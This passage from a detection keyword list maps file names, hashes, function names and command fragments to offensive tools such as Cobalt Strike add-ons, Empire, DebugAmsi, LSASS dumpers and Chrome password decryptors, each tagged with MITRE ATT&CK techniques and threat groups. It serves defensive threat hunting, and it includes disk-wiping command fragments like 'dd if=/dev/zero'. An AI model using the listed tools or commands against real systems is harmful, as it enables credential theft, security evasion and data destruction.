- T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*dcsync.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*dcsync@protonmail.com*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*dcsync_inject*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*dcsyncattack(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dcsyncclient.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*dcsyncclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dd if=/dev/nul*,greyware_tool_keyword,dd,Detects overwriting (effectively wiping/deleting) the file,T1070.004 - T1485,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*dd if=/dev/zero*,greyware_tool_keyword,dd,Detects overwriting (effectively wiping/deleting) the file,T1070.004 - T1485,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*dd310c7a9d558083387ae42d137624df205051094b619f59edf7899af42104c8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*dd7fef5e3594eb18dd676e550e128d4b64cc5a469ff6954a677dc414265db468*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*DE7B9E6B-F73B-4573-A4C7-D314B528CFCB*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*deb.torproject.org/torproject.org/*.asc*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DebugAmsi.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi.sln*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi.vcxproj*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsi-main*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsix64.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*DebugAmsix86.exe*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,1,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*debugfs /dev/*,greyware_tool_keyword,debugdfs,Linux SIEM Bypass with debugdfs shell,T1059 - T1053 - T1037,TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*decoder-it/LocalPotato*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*Decode-RoutingPacket*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decoy_document.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*decrypt.py .\*.txt utf-16-le*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,0,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*decrypt_chrome_password.py*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*Decrypt-Bytes*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decrypt-chrome-passwords-main*,offensive_tool_keyword,decrypt-chrome-passwords,A simple program to decrypt chrome password saved on your machine.,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/ohyicong/decrypt-chrome-passwords,1,1,N/A,10,7,673,147,2023-10-02T18:22:13Z,2020-12-28T15:11:12Z -*Decrypt-CipherText*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DecryptNextCharacterWinSCP*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*decryptteamviewer*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DecryptWinSCPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DeEpinGh0st/Erebus*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*deepinstinct/ContainYourself*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*deepinstinct/LsassSilentProcessExit*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*deepinstinct/NoFilter*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*deepsound2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*deepzec*,offensive_tool_keyword,Github Username,Github Author of malicious scripts and eploitaiton tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/deepzec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*defanger exclusion*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*defanger realtime*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*defanger signature*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*default_userpass_for_services_unhash*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*default_users_for_services_unhash.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be 